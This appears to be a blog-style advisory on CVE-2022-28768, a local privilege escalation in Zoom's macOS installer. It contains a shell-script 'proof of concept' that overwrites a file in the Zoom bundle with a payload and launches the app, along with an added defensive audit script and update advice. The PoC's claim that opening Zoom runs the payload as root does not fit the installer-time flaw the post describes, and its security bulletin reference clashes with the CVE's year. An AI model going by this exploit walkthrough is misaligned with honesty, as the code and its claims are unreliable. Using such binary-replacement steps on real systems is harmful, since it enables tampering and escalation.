The popular video conferencing software Zoom has become an essential tool for remote work, online classes, and virtual gatherings. Its widespread use has made it a target for cybercriminals who are constantly looking for vulnerabilities that could be exploited. One recent discovery is a local privilege escalation vulnerability affecting the Zoom Client for Meetings Installer for macOS (Standard and for IT Admin) before version 5.12.6.

In this post, we will discuss the details of the CVE-2022-28768 vulnerability, the affected software versions, a demo code snippet, how an attacker could exploit this vulnerability, recommended mitigation steps, and important references to the original research.

Details of CVE-2022-28768

CVE-2022-28768 is a local privilege escalation vulnerability that affects Zoom Client for Meetings Installer for macOS (Standard and for IT Admin) versions prior to 5.12.6. A local low-privileged user could potentially exploit this vulnerability during the installation process to escalate their privileges to root. This would allow the attacker to execute arbitrary code, manipulate files, or gain control of the affected system.

The vulnerability is caused by improper permissions handling during the installation of Zoom Client. The installation script incorrectly sets the permissions, allowing any local user to modify or overwrite the installed components. As a result, a malicious local user could replace these components with malicious code that could be executed with root privileges when the Zoom Client is started.

Demo Code Snippet

A simple shell script that demonstrates how an attacker could exploit CVE-2022-28768 is shown below. This script shows how to replace the legitimate Zoom Client binary with a malicious payload that would be executed with root privileges when the Zoom Client is started.

#!/bin/bash

# Proof-of-Concept exploit for CVE-2022-28768 (Local Privilege Escalation in Zoom Client for macOS)
# Replace /Applications/zoom.us.app/Contents/MacOS/ZoomSDKVideoUI.framework/Resources/ZoomSDKVideoUI with a malicious payload
# Execute Zoom Client to run the malicious payload with root privileges

# Path to the Zoom Client binary
ZOOM_CLIENT_PATH="/Applications/zoom.us.app/Contents/MacOS/ZoomSDKVideoUI.framework/Resources/ZoomSDKVideoUI"

# Backup original Zoom Client binary
mv "$ZOOM_CLIENT_PATH" "$ZOOM_CLIENT_PATH.bak"

# Create a malicious payload (just a simple 'echo' command for demo purposes)
cat > /tmp/malicious_payload.sh << EOL
#!/bin/sh
echo "CVE-2022-28768 Exploit Successful"
EOL

# Make the malicious payload executable
chmod +x /tmp/malicious_payload.sh

# Replace the Zoom Client binary with the malicious payload
cp /tmp/malicious_payload.sh "$ZOOM_CLIENT_PATH"

# Run the Zoom Client and execute the malicious payload with root privileges
open /Applications/zoom.us.app

Impact and Exploit Details

If successfully exploited, this vulnerability allows a local low-privileged user to gain root access to the affected macOS system. This could lead to unauthorized access to sensitive information, data modification or deletion, and a compromised system.

Mitigation Steps

The vulnerability has been fixed in Zoom Client for Meetings Installer for macOS version 5.12.6. Users should immediately update their Zoom Client to this version or later to address the vulnerability.
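The two checks an administrator needs to act on this advisory are the ones stated above: whether the installed client is older than 5.12.6, and whether the installed bundle still carries the permission defect described earlier (components writable by any local user). The following script is an added example written for this post; it is not code from the original post or from Zoom. It assumes the bundle lives at /Applications/zoom.us.app and that its Info.plist carries the standard CFBundleShortVersionString key; both the version comparison and the permission audit are also exposed as functions so they can be run against any version string or directory.

```shell
#!/bin/sh
# Added defensive audit for CVE-2022-28768 (example code, not from the post or from Zoom).
# Assumptions: bundle at /Applications/zoom.us.app (override with ZOOM_APP),
# version read from the standard CFBundleShortVersionString key via PlistBuddy.

FIXED_VERSION="5.12.6"                       # first release that ships the fix
ZOOM_APP="${ZOOM_APP:-/Applications/zoom.us.app}"

# version_lt A B: exit 0 when dot-separated numeric version A is older than B.
# A trailing dot is appended so cut always sees a delimiter and prints an empty
# field (treated as 0) instead of echoing the whole string for short versions.
version_lt() {
    _a="$1."; _b="$2."; _i=1
    while [ "$_i" -le 8 ]; do
        _fa=$(printf '%s' "$_a" | cut -d. -f"$_i")
        _fb=$(printf '%s' "$_b" | cut -d. -f"$_i")
        [ -z "$_fa" ] && [ -z "$_fb" ] && return 1        # no fields left: equal
        _fa=${_fa:-0}; _fb=${_fb:-0}
        case "$_fa$_fb" in *[!0-9]*) return 1 ;; esac     # refuse non-numeric input
        [ "$_fa" -lt "$_fb" ] && return 0
        [ "$_fa" -gt "$_fb" ] && return 1
        _i=$((_i + 1))
    done
    return 1
}

# zoom_version_vulnerable V: exit 0 when V is older than the fixed release.
zoom_version_vulnerable() {
    version_lt "$1" "$FIXED_VERSION"
}

# installed_zoom_version: print the bundle's short version string, or fail.
installed_zoom_version() {
    _plist="$ZOOM_APP/Contents/Info.plist"
    [ -f "$_plist" ] && [ -x /usr/libexec/PlistBuddy ] || return 1
    /usr/libexec/PlistBuddy -c 'Print :CFBundleShortVersionString' "$_plist"
}

# world_writable_files DIR: list entries under DIR that any local user may write.
# Symlinks are skipped because macOS reports them as mode 777 regardless of target.
world_writable_files() {
    find "$1" ! -type l -perm -002 2>/dev/null
}

# Report on the real bundle when present; harmless no-op elsewhere.
if [ -d "$ZOOM_APP" ]; then
    if _v=$(installed_zoom_version); then
        if zoom_version_vulnerable "$_v"; then
            echo "Zoom $_v is older than $FIXED_VERSION: update (CVE-2022-28768)"
        else
            echo "Zoom $_v is at or above $FIXED_VERSION"
        fi
    else
        echo "Could not read the Zoom version from $ZOOM_APP"
    fi
    _n=$(world_writable_files "$ZOOM_APP" | wc -l | tr -d ' ')
    echo "World-writable entries inside the bundle: $_n"
    [ "$_n" -eq 0 ] || world_writable_files "$ZOOM_APP"
else
    echo "No Zoom bundle found at $ZOOM_APP"
fi
```

Run it as any local user; a non-zero count of world-writable entries after updating is worth a closer look, since the fixed installer should not leave bundle components writable by every local account.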

Original References

1. Zoom Client for Meeting Security Bulletin ZSA-2021-12
2. CVE-2022-28768 - National Vulnerability Database (NVD)

Conclusion

Local privilege escalation vulnerabilities like CVE-2022-28768 present a significant security risk to users, and it's crucial that software vendors and users stay vigilant in addressing these risks. By promptly deploying security updates and practicing good security hygiene, users can protect themselves from potential exploitation of vulnerabilities in their software applications.

Timeline

Published on: 11/17/2022 23:15:00 UTC
Last modified on: 11/22/2022 17:12:00 UTC